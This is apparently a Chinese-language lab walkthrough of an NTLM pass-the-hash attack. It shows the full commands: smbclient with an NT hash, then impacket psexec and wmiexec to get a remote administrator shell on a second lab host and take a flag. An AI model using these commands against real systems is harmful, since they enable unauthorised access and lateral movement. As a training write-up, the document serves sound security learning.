NTLM PtH
NTLM PtH
已知靶機 192.168.197.211,帳號 / 密碼 : gunther / password123!
透過 PTH 技術登入到靶機 192.168.197.212
並在 Administrator 桌面上找到 Flag
第一步先用已知的帳號密碼登入 192.168.197.211
登入後輸入 \\192.168.197.212\secrets,會跳出如下的帳號密碼驗證視窗
使用 gunther 與密碼 password123! 無法登入,所以看來第二台沒有該帳號權限
先抓取現有登入機器的 administrator 帳號 HASH 如下 7a38310ea6f0027ee955abed1762964b
從攻擊機直接透過 smbclient 指令,並指定使用者 administrator 然後密碼用 HASH 登入測試
└─$ smbclient \\\\192.168.197.212\\secrets -U Administrator --pw-nt-hash 7a38310ea6f0027ee955abed1762964b
接下來使用 impacket 庫中的 psexec.py 腳本來拿 remote shell
由於 HASH 的格式為 "LMHash:NTHash" (LM 在現今系統已無使用,但還是要輸入不可空白)
使用如下指令登入,記得 LM Hash 要輸入一樣的長度,直接用 0 代替即可
└─$ impacket-psexec -hashes 00000000000000000000000000000000:7a38310ea6f0027ee955abed1762964b Administrator@192.168.197.212
直接就拿到 remote shell 了,ipconfig 看一下確定是 192.168.197.212 那一台
直接到管理員桌面拿 flag 吧
因為 impacket 當中包含了許多指令與套件,我們可以使用另外一個 wmiexec 也可以成功拿到 remote shell,指令 └─$ impacket-wmiexec -hashes 00000000000000000000000000000000:7a38310ea6f0027ee955abed1762964b Administrator@192.168.197.212
留言
張貼留言